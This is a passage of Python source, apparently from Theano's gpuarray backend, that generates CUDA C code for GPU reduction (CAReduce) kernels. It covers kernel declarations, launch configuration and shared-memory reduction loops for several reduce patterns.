""" % locals(), file=sio)
#
# Now perform the reduction
#
if all(i == 1 for i in self.reduce_mask):
            # check if the tensor is c-contiguous; if so, use the c_code_reduce_ccontig code.
            # TODO: check if we are c-contiguous when we un-dimshuffle
            # TODO: if only some dims are c-contiguous, call a version with fewer dims.
print('if(%(x)s->ga.flags & GA_C_CONTIGUOUS){' % locals(),
file=sio)
self.c_code_reduce_ccontig(sio, node, name, x, z, fail)
print("}else{", file=sio)
getattr(self, 'c_code_reduce_%s' %
(''.join(str(i) for i in self.reduce_mask)))(
sio, node, name, x, z, fail)
print("}", file=sio)
else:
getattr(self, 'c_code_reduce_%s' % (''.join(
str(i) for i in self.reduce_mask)))(sio, node, name, x, z, fail)
# \end bracket the reduction ...
print("""
}
""" % locals(), file=sio)
return sio.getvalue()
def _makecall(self, node, name, x, z, fail, pattern=None, extra_dims=(), extra_strides=()):
"""
Return a string for making a kernel call.
The return value looks something like:
.. code-block:: c
ssize_t stride_A0 = PyGpuArray_STRIDES(%(x)s)[0]/sizeof(%(in_dtype)s);
ssize_t stride_A1 = PyGpuArray_STRIDES(%(x)s)[1]/sizeof(%(in_dtype)s);
ssize_t stride_Z0 = PyGpuArray_STRIDES(%(z)s)[0]/sizeof(%(out_dtype)s);
if (verbose)
printf("running kernel_reduce_10_%(name)s\\n");
size_t n_shared = sizeof(%(acc_dtype)s) * n_threads[0] * n_threads[1] * n_threads[2];
void *kernel_params[] = {
(void *)&PyGpuArray_DIMS(%(x)s)[0],
(void *)&PyGpuArray_DIMS(%(x)s)[1],
(void *)%(x)s->ga.data,
(void *)&%(x)s->ga.offset,
(void *)&stride_A0,
(void *)&stride_A1,
(void *)%(z)s->ga.data,
(void *)&%(z)s->ga.offset,
(void *)&stride_Z0};
int err = GpuKernel_call(&%(k_var)s, 3, n_threads, n_blocks, n_shared, kernel_params);
%(err_check)s
"""
in_dtype = "npy_" + node.inputs[0].dtype
out_dtype = "npy_" + node.outputs[0].dtype
acc_dtype = "npy_" + self._acc_dtype(node.inputs[0].dtype)
sio = StringIO()
if pattern is None:
pattern = ''.join(str(c) for c in self.reduce_mask)
ndim = len(self.reduce_mask)
nd_out = ndim - sum(self.reduce_mask)
shapes_format = "shape=(%s)" % ",".join(["%llu"] * node.inputs[0].ndim)
shapes_data = ",".join(["(size_t) PyGpuArray_DIMS(%s)[%d]" % (x, i)
for i in range(node.inputs[0].ndim)])
k_var = "kernel_reduce_%(pattern)s_%(name)s" % locals()
params = []
for i in xrange(ndim):
params.append("(void *)&PyGpuArray_DIMS(%(x)s)[%(i)s]" % locals())
for declaration, value in extra_dims:
print(declaration % locals(), file=sio)
params.append(value)
params.append("(void *)%(x)s->ga.data" % locals())
params.append("(void *)&%(x)s->ga.offset" % locals())
for i in xrange(ndim):
print("""
ssize_t stride_A%(i)d = PyGpuArray_STRIDES(%(x)s)[%(i)s]/sizeof(%(in_dtype)s);
""" % locals(), file=sio)
params.append("(void *)&stride_A%(i)d" % locals())
for declaration, value in extra_strides:
print(declaration % locals(), file=sio)
params.append(value)
params.append("(void *)%(z)s->ga.data" % locals())
params.append("(void *)&%(z)s->ga.offset" % locals())
for i in xrange(nd_out):
print("""
ssize_t stride_Z%(i)d = PyGpuArray_STRIDES(%(z)s)[%(i)s]/sizeof(%(out_dtype)s);
""" % locals(), file=sio)
params.append("(void *)&stride_Z%(i)d" % locals())
kernel_params = ', '.join(params)
err_check = """
if (err != GA_NO_ERROR) {
PyErr_Format(PyExc_RuntimeError,
"gpuarray error: %(k_var)s: %%s.",
GpuKernel_error(&%(k_var)s, err));
%(fail)s;
}
""" % locals()
print("""
if (verbose)
printf("running kernel_reduce_%(pattern)s_%(name)s\\n");
size_t n_shared = sizeof(%(acc_dtype)s) * n_threads[0] * n_threads[1] * n_threads[2];
void *kernel_params[] = { %(kernel_params)s };
if (verbose>1)
printf("n_threads[0]=%%lu, n_threads[1]=%%lu, "
"n_threads[2]=%%lu, n_threads=%%lu, "
"n_blocks[0]=%%lu, n_blocks[1]=%%lu, n_blocks[2]=%%lu, "
"n_blocks=%%lu, n_shared=%%d, %(shapes_format)s\\n",
n_threads[0],n_threads[1],
n_threads[2],
n_threads[0]*n_threads[1]*
n_threads[2],
n_blocks[0],n_blocks[1],n_blocks[2],
n_blocks[0]*n_blocks[1]*n_blocks[2],
n_shared, %(shapes_data)s);
int err = GpuKernel_call(&%(k_var)s, 3, n_threads, n_blocks, n_shared, kernel_params);
%(err_check)s
""" % locals(), file=sio)
sync = ""
if config.gpuarray.sync:
sync = """
err = GpuArray_sync(&%(z)s->ga);
%(err_check)s
""" % locals()
print("""
%(sync)s
""" % locals(), file=sio)
return sio.getvalue()
def _k_decl(self, node, nodename, pattern=None,
ndim=None, reduce_mask=None):
"""
Return a string to declare a kernel function.
The result will look something like this:
.. code-block:: c
KERNEL void kernel_reduce_110_%(nodename)s(
const ga_size d0,
const ga_size d1,
const ga_size d2,
const %(in_type)s *A,
const ga_size offset_A,
const ga_ssize sA0,
const ga_ssize sA1,
const ga_ssize sA2,
%(out_type)s * Z,
const ga_size offset_Z,
const ga_ssize sZ0)
Since the nodename is unique, we don't need to put the name
of the scalar_op in here.
"""
in_dtype = node.inputs[0].dtype
out_dtype = node.outputs[0].dtype
in_type = gpuarray.dtype_to_ctype(in_dtype)
out_type = gpuarray.dtype_to_ctype(out_dtype)
if reduce_mask is None:
reduce_mask = self.reduce_mask
if ndim is None:
ndim = len(reduce_mask)
if pattern is None:
pattern = ''.join(str(i) for i in reduce_mask)
kname = "kernel_reduce_%(pattern)s" % locals()
k_var = "kernel_reduce_%(pattern)s_%(nodename)s" % locals()
params = []
sio = StringIO()
print("""
KERNEL void %(kname)s(
""" % locals(), file=sio)
for i in xrange(ndim):
params.append('uintp')
print("""
const ga_size d%(i)s,
""" % locals(), file=sio)
params.append(gpuarray.GpuArray)
params.append('uintp')
print("""
const %(in_type)s *A, const ga_size offset_A,
""" % locals(), file=sio)
for i in xrange(ndim):
params.append('intp')
print("""
const ga_ssize sA%(i)s,
""" % locals(), file=sio)
params.append(gpuarray.GpuArray)
params.append('uintp')
print("""
%(out_type)s * Z, const ga_size offset_Z
""" % locals(), file=sio)
for i in xrange(ndim - sum(reduce_mask)):
params.append('intp')
print("""
, const ga_ssize sZ%(i)s
""" % locals(), file=sio)
print(")", file=sio)
return sio.getvalue(), kname, params, k_var
def _k_init(self, node, nodename):
in_dtype = node.inputs[0].dtype
out_dtype = node.outputs[0].dtype
acc_dtype = self._acc_dtype(node.inputs[0].dtype)
# We need to use theano_complex* and not npy_complex*
in_type = gpuarray.dtype_to_ctype(in_dtype)
out_type = gpuarray.dtype_to_ctype(out_dtype)
acc_type = gpuarray.dtype_to_ctype(acc_dtype)
return """
const int threadCount = blockDim.x * blockDim.y * blockDim.z;
const int threadNum = threadIdx.z * blockDim.x * blockDim.y
+ threadIdx.y * blockDim.x + threadIdx.x;
extern __shared__ %(acc_type)s buf[];
%(acc_type)s myresult = 0;
A = (const %(in_type)s *)(((char *)A)+offset_A);
Z = (%(out_type)s *)(((char *)Z)+offset_Z);
//This is caught in cuda/init.py when we init the gpu. I keep
        //it here to ease finding code that relies on this.
if (warpSize != 32)
{
Z[0] = -666;
return;
}
""" % locals()
def _assign_init(self, first_item):
"""
        This returns the initial value for myresult.
        If the scalar op has an identity value, return it.
        Otherwise, check that the scalar op is maximum or minimum
        and return first_item. It should be the first element of the reduction.
        As the maximum and minimum of the same value don't change, this works.
"""
if hasattr(self.scalar_op, 'identity'):
return str(self.scalar_op.identity)
else:
assert isinstance(self.scalar_op, (scal.Maximum,
scal.Minimum))
if self.pre_scalar_op: # TODO: multiple dtypes
# dtype = node.inputs[0].dtype
dtype = 'float32'
dummy_var = scal.Scalar(dtype=dtype)()
dummy_node = self.pre_scalar_op.make_node(dummy_var)
dummy_name = 'assign_init_pre_scalar_op' + str(self._n_scalar_op_calls)
self._n_scalar_op_calls += 1
t = self.pre_scalar_op.c_code(dummy_node, dummy_name,
(first_item,), ("",), {})
assert t.startswith(' = ')
first_item = t[3:]
if first_item[-1] == ';':
first_item = first_item[:-1]
return first_item
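    # For example (a sketch): with scal.add (identity 0) this returns "0";
    # with scal.maximum (no identity) and first_item "A[0]" it returns
    # "A[0]", optionally pushed through pre_scalar_op first.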
def _assign_reduce(self, node, name, left, right, sub, pre):
"""
Parameters
----------
node
The node argument to this op's c_code.
name
The name argument to this op's c_code.
left
A C code string identifying an lvalue.
right
A C code string identifying an expression.
sub
The sub argument to this op's c_code.
pre
If True, we will add the pre_scalar_op.c_code.
Returns
-------
str
C code to reduce left and right, assigning the result to left.
"""
x, = node.inputs
in_dtype = x.dtype
out_dtype = node.outputs[0].dtype
dummy_left = Scalar(dtype=out_dtype)()
dummy_right = Scalar(dtype=in_dtype)()
dummy_node = self.scalar_op.make_node(dummy_left, dummy_right)
dummy_name = name + '_scalar_op' + str(self._n_scalar_op_calls)
self._n_scalar_op_calls += 1
if pre and self.pre_scalar_op:
assert left == "myresult"
dummy_node = self.pre_scalar_op.make_node(dummy_left)
dummy_name = name + '_scalar_op' + str(self._n_scalar_op_calls)
self._n_scalar_op_calls += 1
t = self.pre_scalar_op.c_code(dummy_node, dummy_name,
(right,), ("",), sub)
assert t.startswith(' = ')
right = t[3:]
if right[-1] == ';':
right = right[:-1]
return self.scalar_op.c_code(dummy_node, dummy_name, (left, right),
(left,), sub)
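    # For example (a sketch): with scalar_op = scal.add,
    #   self._assign_reduce(node, name, "myresult", "buf[i]", sub, False)
    # yields C code along the lines of "myresult = myresult + buf[i];".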
def _k_reduce_buf(self, z_pos, node, name, sub):
"""
        Write the C code that folds each thread's partial result (stored in
        the shared buffer ``buf``) into a single value written to ``z_pos``.
Parameters
----------
node, name, sub
These should be passed through from the original call to c_code.
"""
in_dtype = "npy_" + node.inputs[0].dtype
out_dtype = "npy_" + node.outputs[0].dtype
acc_dtype = "npy_" + self._acc_dtype(node.inputs[0].dtype)
write_out = write_w(node.outputs[0].dtype)
# This code (the code in new_version) is currently ignored.
# Code produced later in this function is returned instead.
        # The code here works with all NVIDIA drivers,
        # but only for thread counts that are powers or multiples of 2!
new_version = """
        __syncthreads(); // some kernels do multiple reductions.
buf[threadNum] = myresult;
__syncthreads();
if (threadNum >= ((threadCount >> 1) * 2))
{
int idx = threadNum - (threadCount >> 1) * 2;"""
new_version += self._assign_reduce(node, name, 'buf[idx]',
'buf[threadNum]', sub, False)
new_version += """
}
__syncthreads();
// Works for power of 2 only.
int nTotalThreads = threadCount; // Total number of active threads
while(nTotalThreads > 1)
{
int halfPoint = (nTotalThreads >> 1); // divide by two
// only the first half of the threads will be active.
if (threadNum < halfPoint)
{
// Get the shared value stored by another thread
%(acc_dtype)s temp = buf[threadNum + halfPoint];
"""
new_version += self._assign_reduce(node, name,
'buf[threadNum]', 'temp', sub, False)
new_version += """
}
__syncthreads();
nTotalThreads = (nTotalThreads >> 1); // divide by two.
}
__syncthreads();
if (threadNum == 0)
{
%(z_pos)s = %(write_out)s(buf[0]);
}
__syncthreads();"""
new_version = new_version % locals()
current_version = """
        __syncthreads(); // some kernels do multiple reductions.
buf[threadNum] = myresult;
__syncthreads();
// rest of function is handled by one warp
if (threadNum < warpSize)
{
//round up all the partial sums into the first `warpSize` elements
for (int i = threadNum + warpSize; i < threadCount; i += warpSize)
{
"""
current_version += self._assign_reduce(node, name,
'myresult', 'buf[i]',
sub, False) + """
}
buf[threadNum] = myresult;
            /*This optimization is commented out as it doesn't work on Fermi GPUs.
            TODO: find out why it doesn't work, or put the GPU compute capability into the version
// no sync because only one warp is running
if(threadCount >32)
{"""
for num in [16, 8, 4, 2, 1]:
current_version += self._assign_reduce(node, name,
'buf[threadNum]',
'buf[threadNum+%d]' % num,
sub, False)
current_version += """
"""
current_version += """
if (threadNum == 0)
{
%(z_pos)s = %(write_out)s(buf[0]);
}
}
else */
if (threadNum < 16)
{
//reduce so that threadNum 0 has the reduction of everything
"""
for num in [16, 8, 4, 2, 1]:
this_if = "if (threadNum + %d < threadCount) " % num + \
self._assign_reduce(node, name,
'buf[threadNum]', 'buf[threadNum+%d]' % num,
sub, False)
current_version += this_if
current_version += """
"""
current_version += """
if (threadNum == 0)
{
%(z_pos)s = %(write_out)s(buf[0]);
}
}
}
"""
current_version = current_version % locals()
return current_version
    # Threads must be organized so that all threads with the same
    # threadNum % nb_reduce contribute to the same sum (nb_reduce <= warpSize).
def _k_reduce_buf_multiple(self, z_pos, node, name, nb_reduce):
reduce_fct = self._assign_reduce(node, name, 'myresult', 'buf[i]', {}, False)
write_out = write_w(node.outputs[0].dtype)
return """
        __syncthreads(); // some kernels do multiple reductions.
buf[threadNum] = myresult;
__syncthreads();
// rest of function is handled by one warp
if (threadNum < %(nb_reduce)s)
{
//round up all the partial sums into the first `nb_reduce` elements
for (int i = threadNum + %(nb_reduce)s; i < threadCount; i += %(nb_reduce)s)
{
%(reduce_fct)s;
}
%(z_pos)s = %(write_out)s(myresult);
}
""" % locals()
def c_code_reduce_ccontig(self, sio, node, name, x, z, fail):
in_dtype = "npy_" + node.inputs[0].dtype
out_dtype = "npy_" + node.outputs[0].dtype
if getattr(self.scalar_op, 'identity', None) == 0:
zero_shp = "GpuArray_memset(&%(z)s->ga, 0)" % locals()
# TODO: elif getattr(self.scalar_op, 'identity', None) == 1:
else:
zero_shp = """
PyErr_Format(PyExc_NotImplementedError,
"GpuCAReduceCuda not implemented when input shape is 0 for this scalar_op");
%(fail)s;
""" % locals()
acc_dtype = "npy_" + self._acc_dtype(node.inputs[0].dtype)
k_var = "kernel_reduce_ccontig_%(name)s" % locals()
err_check = """
if (err != GA_NO_ERROR) {
PyErr_Format(PyExc_RuntimeError,
"gpuarray error: %(k_var)s: %%s.",
GpuKernel_error(&%(k_var)s, err));
%(fail)s;
}
""" % locals()
sync = ""
if config.gpuarray.sync:
sync = """
err = GpuArray_sync(&%(z)s->ga);
%(err_check)s
""" % locals()
print("""
{
if(PyGpuArray_SIZE(%(x)s)==0){
%(zero_shp)s;
}else{
int verbose = 0;
size_t numEls = PyGpuArray_SIZE(%(x)s);
size_t n_threads = std::min(numEls, (size_t) 256);
size_t n_blocks = 1;
void *kernel_params[] = {(void *)&numEls,
(void *)%(x)s->ga.data,
(void *)&%(x)s->ga.offset,
(void *)%(z)s->ga.data,
(void *)&%(z)s->ga.offset};
if (verbose) printf("running kernel_reduce_ccontig_%(name)s"
" n_threads=%%llu, size=%%llu, ndim=%%u\\n",
n_threads, numEls,
PyGpuArray_NDIM(%(x)s));
size_t n_shared = sizeof(%(acc_dtype)s) * n_threads;
int err = GpuKernel_call(&%(k_var)s, 1, &n_threads, &n_blocks, n_shared, kernel_params);
%(err_check)s
%(sync)s
}
}
""" % locals(), file=sio)
def c_code_reduce_1(self, sio, node, name, x, z, fail):
makecall = self._makecall(node, name, x, z, fail)
print("""
{
int verbose = 0;
size_t n_threads[3] = {std::min(PyGpuArray_DIMS(%(x)s)[0], (size_t) 256), 1, 1};
size_t n_blocks[3] = {1, 1, 1};
%(makecall)s
}
""" % locals(), file=sio)
def c_code_reduce_11(self, sio, node, name, x, z, fail):
makecall = self._makecall(node, name, x, z, fail)
print("""
{
int verbose = 0;
size_t n_threads[3] = {std::min(PyGpuArray_DIMS(%(x)s)[1], (size_t) 256), 1, 1};
while (n_threads[1] * n_threads[0] <= 256) ++n_threads[1];
n_threads[1] -= 1;
if (n_threads[1] > PyGpuArray_DIMS(%(x)s)[0])
n_threads[1] = PyGpuArray_DIMS(%(x)s)[0];
size_t n_blocks[3] = {1, 1, 1};
%(makecall)s
}
""" % locals(), file=sio)
def c_code_reduce_01X(self, sio, node, name, x, z, fail, N):
"""
Parameters
----------
N
            The number of 1s in the pattern: N=1 -> 01, N=2 -> 011, N=3 -> 0111.
            Works for N=1, 2, 3.
"""
assert N in [1, 2, 3]
in_dtype = "npy_" + node.inputs[0].dtype
out_dtype = "npy_" + node.outputs[0].dtype
makecall = self._makecall(node, name, x, z, fail)
N_pattern = ''.join(['1'] * N)
param_dim = ",".join(["PyGpuArray_DIMS(%s)[%d]" % (x, i)
for i in xrange(N + 1)])
strides_dim = ",".join(["PyGpuArray_STRIDES(%s)[%d]/sizeof(%s)"
% (x, i, in_dtype) for i in xrange(N + 1)])
threads_y = """
//get as many y threads as we can fit
while (n_threads[0] * (n_threads[1]+1) <= 256)
{
if (n_threads[1] < PyGpuArray_DIMS(%(x)s)[%(N)s-1])
n_threads[1] += 1;
else
break;
}""" % locals()
threads_z = """
//get as many z threads as we can fit
while (n_threads[0] * n_threads[1] * (n_threads[2]+1) <= 256)
{
if (n_threads[2] < PyGpuArray_DIMS(%(x)s)[%(N)s-2])
n_threads[2] += 1;
else
break;
}
//Maximum for Fermi GPU on that dimensions.
n_threads[2] = std::min(n_threads[2], (size_t)64);
""" % locals()
if len(self.reduce_mask) == 2:
threads_y = ''
threads_z = ''
if len(self.reduce_mask) == 3:
threads_z = ''
print("""
{
int verbose = 0;
size_t n_threads[3] = {std::min(PyGpuArray_DIMS(%(x)s)[%(N)s], (size_t) 256), 1, 1};
%(threads_y)s
%(threads_z)s
size_t n_blocks[3] = {std::min(PyGpuArray_DIMS(%(x)s)[0], (size_t) 4096), 1, 1};
%(makecall)s
}
""" % locals(), file=sio)
def c_code_reduce_01(self, sio, node, name, x, z, fail):
self.c_code_reduce_01X(sio, node, name, x, z, fail, 1)
def c_code_reduce_011(self, sio, node, name, x, z, fail):
self.c_code_reduce_01X(sio, node, name, x, z, fail, 2)
def c_code_reduce_0111(self, sio, node, name, x, z, fail):
self.c_code_reduce_01X(sio, node, name, x, z, fail, 3)
def c_code_reduce_10(self, sio, node, name, x, z, fail):
in_dtype = "npy_" + node.inputs[0].dtype
out_dtype = "npy_" + node.outputs[0].dtype
acc_dtype = "npy_" + self._acc_dtype(node.inputs[0].dtype)
k_var = "kernel_reduce_10_%(name)s" % locals()
err_check = """
if (err != GA_NO_ERROR) {
PyErr_Format(PyExc_RuntimeError,
"gpuarray error: %(k_var)s: %%s.",
GpuKernel_error(%(k_var)s, err));
%(fail)s;
}
""" % locals()
sync = ""
if config.gpuarray.sync:
sync = """
err = GpuArray_sync(&%(z)s->ga);
%(err_check)s
""" % locals()
print("""
{
int verbose = 0;
if(PyGpuArray_STRIDES(%(x)s)[0]>
PyGpuArray_STRIDES(%(x)s)[1]){
// If there are a lot of summations to do, then we can use simple parallelization -
// use each thread to do one sum.
// we might as well launch blocks of 32 threads because that's the warp size.
// we could schedule more threads if we were maxing out the gridsize below, but
// the gridsize is way more than the physical hardware and I think 32 threads
// on a huge grid is enough to fully use the hardware.
size_t n_threads[3] = {32, 1, 1};
            // We kind of reshape the input implicitly to something 4D:
// the shape A,B,C -> A, B, D, E
// where C <= D*E < C+32
// where E==32
GpuKernel *%(k_var)s = &kernel_reduce_010_AD_%(name)s;
size_t A = 1;
size_t B = PyGpuArray_DIMS(%(x)s)[0];
size_t C = PyGpuArray_DIMS(%(x)s)[1];
size_t D = C/32;
if (32*D < C) D+= 1;
assert ((C <= 32*D) && (32*D < C+32));
// The gridsize would ideally be (A, D). But we do the following logic to make
// sure we don't ask for a grid that is too big.
size_t n_blocks[3] = {A, D, 1};
if (n_blocks[0] > 4096) n_blocks[0] = 4096;
if (n_blocks[0]*n_blocks[1] > 4096) n_blocks[1] = 4096/n_blocks[0];
ssize_t stride_A0 = 1;
ssize_t stride_A1 = PyGpuArray_STRIDES(%(x)s)[0]/sizeof(%(in_dtype)s);
ssize_t stride_A2 = PyGpuArray_STRIDES(%(x)s)[1]/sizeof(%(in_dtype)s);
ssize_t stride_Z0 = 1;
ssize_t stride_Z1 = PyGpuArray_STRIDES(%(z)s)[0]/sizeof(%(out_dtype)s);
void *kernel_params[] = {
(void *)&A, (void *)&B, (void *)&C, (void *)&D,
(void *)%(x)s->ga.data,
(void *)&%(x)s->ga.offset,
(void *)&stride_A0, (void *)&stride_A1, (void *)&stride_A2,
(void *)%(z)s->ga.data,
(void *)&%(z)s->ga.offset,
(void *)&stride_Z0, (void *)&stride_Z1};
int err = GpuKernel_call(%(k_var)s, 3, n_threads, n_blocks, 0, kernel_params);
%(err_check)s
%(sync)s
}else{
GpuKernel *%(k_var)s = &kernel_reduce_010_%(name)s;
size_t n_threads[3] = {std::min(PyGpuArray_DIMS(%(x)s)[0], (size_t) 256), 1, 1};
size_t n_blocks[3] = {1, std::min(PyGpuArray_DIMS(%(x)s)[1], (size_t) 4096), 1};
if (verbose) {
fprintf(stderr,
"running kernel_reduce_10_%(name)s n_blocks=(%%llu,%%llu)\\n",
(unsigned long long)n_blocks[0],
(unsigned long long)n_blocks[1]);
}
assert(PyGpuArray_DIMS(%(x)s)[1] == PyGpuArray_DIMS(%(z)s)[0]);
size_t n_shared = sizeof(%(acc_dtype)s) * n_threads[0];
size_t dim_0 = 1;
ssize_t stride_A0 = 1;
ssize_t stride_A1 = PyGpuArray_STRIDES(%(x)s)[0]/sizeof(%(in_dtype)s);
ssize_t stride_A2 = PyGpuArray_STRIDES(%(x)s)[1]/sizeof(%(in_dtype)s);
ssize_t stride_Z0 = 1;
ssize_t stride_Z1 = PyGpuArray_STRIDES(%(z)s)[0]/sizeof(%(out_dtype)s);
void *kernel_params[] = {
(void *)&dim_0,
(void *)&PyGpuArray_DIMS(%(x)s)[0],
(void *)&PyGpuArray_DIMS(%(x)s)[1],
(void *)%(x)s->ga.data, (void *)&%(x)s->ga.offset,
(void *)&stride_A0, (void *)&stride_A1, (void *)&stride_A2,
(void *)%(z)s->ga.data, (void *)&%(z)s->ga.offset,
(void *)&stride_Z0, (void *)&stride_Z1};
int err = GpuKernel_call(%(k_var)s, 3, n_threads, n_blocks, n_shared, kernel_params);
%(err_check)s
%(sync)s
}
}
""" % locals(), file=sio)
def c_code_reduce_010(self, sio, node, name, x, z, fail):
makecall = self._makecall(node, name, x, z, fail)
makecall_inner = self._makecall(node, name, x, z, fail,
pattern="010_inner")
pattern = ''.join(str(i) for i in self.reduce_mask)
in_dtype = "npy_" + node.inputs[0].dtype
out_dtype = "npy_" + node.outputs[0].dtype
k_var = "kernel_reduce_010_AD_%(name)s" % locals()
err_check = """
if (err != GA_NO_ERROR) {
PyErr_Format(PyExc_RuntimeError,
"gpuarray error: %(k_var)s: %%s.",
GpuKernel_error(&%(k_var)s, err));
%(fail)s;
}
""" % locals()
sync = ""
if config.gpuarray.sync:
sync = """
err = GpuArray_sync(&%(z)s->ga);
%(err_check)s
""" % locals()
print("""
{
//int n_summations = PyGpuArray_DIMS(%(x)s)[0] * PyGpuArray_DIMS(%(x)s)[2];
//if ((n_summations >= 15 * 32) && (PyGpuArray_DIMS(%(x)s)[2]>=16))
if (1) // if the alternative is less buggy, consider not using this branch
{
// If there are a lot of summations to do, then we can use simple parallelization -
// use each thread to do one sum.
// we might as well launch blocks of 32 threads because that's the warp size.
// we could schedule more threads if we were maxing out the gridsize below, but
// the gridsize is way more than the physical hardware and I think 32 threads
// on a huge grid is enough to fully use the hardware.
size_t n_threads[3] = {32, 1, 1};
            // We kind of reshape the input implicitly to something 4D:
// the shape A,B,C -> A, B, D, E
// where C <= D*E < C+32
// where E==32
size_t A = PyGpuArray_DIMS(%(x)s)[0];
size_t B = PyGpuArray_DIMS(%(x)s)[1];
size_t C = PyGpuArray_DIMS(%(x)s)[2];
size_t D = C/32;
if (32*D < C) D+= 1;
assert ((C <= 32*D) && (32*D < C+32));
// The gridsize would ideally be (A, D). But we do the following logic to make
// sure we don't ask for a grid that is too big.
size_t n_blocks[3] = {A, D, 1};
if (n_blocks[0] > 4096) n_blocks[0] = 4096;
if (n_blocks[0]*n_blocks[1] > 4096) n_blocks[1] = 4096/n_blocks[0];
ssize_t stride_A0 = PyGpuArray_STRIDES(%(x)s)[0]/sizeof(%(in_dtype)s);
ssize_t stride_A1 = PyGpuArray_STRIDES(%(x)s)[1]/sizeof(%(in_dtype)s);
ssize_t stride_A2 = PyGpuArray_STRIDES(%(x)s)[2]/sizeof(%(in_dtype)s);
ssize_t stride_Z0 = PyGpuArray_STRIDES(%(z)s)[0]/sizeof(%(out_dtype)s);
ssize_t stride_Z1 = PyGpuArray_STRIDES(%(z)s)[1]/sizeof(%(out_dtype)s);
void *kernel_params[] = {
(void *)&A, (void *)&B, (void *)&C, (void *)&D,
(void *)%(x)s->ga.data,
(void *)&%(x)s->ga.offset,
(void *)&stride_A0, (void *)&stride_A1, (void *)&stride_A2,
(void *)%(z)s->ga.data,
(void *)&%(z)s->ga.offset,
(void *)&stride_Z0, (void *)&stride_Z1};
int err = GpuKernel_call(&%(k_var)s, 3, n_threads, n_blocks, 0, kernel_params);
%(err_check)s
%(sync)s
}
else
{
int verbose = 2;
size_t n_threads[3] = {std::min((size_t) 32, PyGpuArray_DIMS(%(x)s)[2]), 1, 1};
while( (n_threads[0]*(n_threads[1]+1)<=256)
&& (n_threads[1]<PyGpuArray_DIMS(%(x)s)[1])){
n_threads[1]++;
}
size_t n_blocks[3] = {std::min(PyGpuArray_DIMS(%(x)s)[0], (size_t)4096), 1, 1};
n_blocks[1] = std::min(
ceil_intdiv(PyGpuArray_DIMS(%(x)s)[2],
(size_t)n_threads[0]),
(size_t)(4096 / n_blocks[0])
);
if(std::min(std::min(PyGpuArray_STRIDES(%(x)s)[0]/sizeof(%(in_dtype)s),
PyGpuArray_STRIDES(%(x)s)[1]/sizeof(%(in_dtype)s)),
PyGpuArray_STRIDES(%(x)s)[2]/sizeof(%(in_dtype)s))
==PyGpuArray_STRIDES(%(x)s)[2]/sizeof(%(in_dtype)s)
&& n_blocks[1]==ceil_intdiv(PyGpuArray_DIMS(%(x)s)[2],
(size_t)n_threads[0])){
if(verbose>1)
printf("n_block.x.1=%%d, n_block.x.2=%%d, n_block.y.1=%%d, n_block.y.2=%%d,\\n",
PyGpuArray_DIMS(%(x)s)[0],4096,
ceil_intdiv(PyGpuArray_DIMS(%(x)s)[2],(size_t)n_threads[0]),
(size_t)(4096 / n_blocks[0]));
assert(n_threads[0]<=32);
%(makecall_inner)s
}else{
n_threads[0] = std::min(PyGpuArray_DIMS(%(x)s)[1],
(size_t) 256);
n_blocks[0] = std::min(PyGpuArray_DIMS(%(x)s)[0], (size_t)4096);
n_blocks[1] = std::min(
PyGpuArray_DIMS(%(x)s)[2],
(size_t)(4096 / n_blocks[0])
);
%(makecall)s
}
%(sync)s
}
}
""" % locals(), file=sio)
def c_code_reduce_0101(self, sio, node, name, x, z, fail):
makecall = self._makecall(node, name, x, z, fail)
print("""
{
int verbose = 0;
size_t n_threads[3] = {std::min(PyGpuArray_DIMS(%(x)s)[3], (size_t) 256), 1, 1};
while (n_threads[0] * n_threads[1] <= 256)
{
if (n_threads[1] > PyGpuArray_DIMS(%(x)s)[1]) break;
n_threads[1] += 1;
}
n_threads[1] -= 1;
size_t n_blocks[3] = {PyGpuArray_DIMS(%(x)s)[0], PyGpuArray_DIMS(%(x)s)[2], 1};
%(makecall)s
}
""" % locals(), file=sio)
def c_code_reduce_100(self, sio, node, name, x, z, fail):
makecall = self._makecall(node, name, x, z, fail)
in_dtype = "npy_" + node.inputs[0].dtype
out_dtype = "npy_" + node.outputs[0].dtype
acc_dtype = "npy_" + self._acc_dtype(node.inputs[0].dtype)
k_var = "kernel_reduce_010_AD_%(name)s" % locals()
err_check = """
if (err != GA_NO_ERROR) {
PyErr_Format(PyExc_RuntimeError,
"gpuarray error: %(k_var)s: %%s.",
GpuKernel_error(&%(k_var)s, err));
%(fail)s;
}
""" % locals()
sync = ""
if config.gpuarray.sync:
sync = """
err = GpuArray_sync(&%(z)s->ga);
%(err_check)s
""" % locals()
# use threadIdx.x for i0
# use blockIdx.x for i1
# use blockIdx.y for i2
print("""
{
int verbose = 0;
if (PyGpuArray_STRIDES(%(x)s)[2] != sizeof(%(in_dtype)s)){
printf("slow\\n");
size_t n_threads[3] = {std::min(PyGpuArray_DIMS(%(x)s)[0], (size_t) 256), 1, 1};
size_t n_blocks[3] = {std::min(PyGpuArray_DIMS(%(x)s)[1], (size_t)4096), 1, 1};
while (n_blocks[0] * (n_blocks[1]+1) <= 4096 &&
n_blocks[1] <= PyGpuArray_DIMS(%(x)s)[2])
{
n_blocks[1] += 1;
}
%(makecall)s
}
else
        { // reuse the 010_AD kernel; we transpose the first 2 dims
          // See the reduction for the real 010_AD kernel for an
          // explanation. We do this to get coalesced reads.
size_t n_threads[3] = {32, 1, 1};
size_t A = PyGpuArray_DIMS(%(x)s)[1];
size_t B = PyGpuArray_DIMS(%(x)s)[0];
size_t C = PyGpuArray_DIMS(%(x)s)[2];
size_t D = C/32;
if (32*D < C) D+= 1;
assert ((C <= 32*D) && (32*D < C+32));
// The gridsize would ideally be (A, D). But we do the following logic to make
// sure we don't ask for a grid that is too big.
size_t n_blocks[3] = {A, D, 1};
if (n_blocks[0] > 4096) n_blocks[0] = 4096;
if (n_blocks[0]*n_blocks[1] > 4096) n_blocks[1] = 4096/n_blocks[0];
size_t n_shared = 0;
ssize_t stride_A0 = PyGpuArray_STRIDES(%(x)s)[1]/sizeof(%(in_dtype)s);
ssize_t stride_A1 = PyGpuArray_STRIDES(%(x)s)[0]/sizeof(%(in_dtype)s);
ssize_t stride_A2 = PyGpuArray_STRIDES(%(x)s)[2]/sizeof(%(in_dtype)s);
ssize_t stride_Z0 = PyGpuArray_STRIDES(%(z)s)[0]/sizeof(%(out_dtype)s);
ssize_t stride_Z1 = PyGpuArray_STRIDES(%(z)s)[1]/sizeof(%(out_dtype)s);
void *kernel_params[] = {
(void *)&A, (void *)&B, (void *)&C, (void *)&D,
(void *)%(x)s->ga.data,
(void *)&%(x)s->ga.offset,
(void *)&stride_A0, (void *)&stride_A1, (void *)&stride_A2,
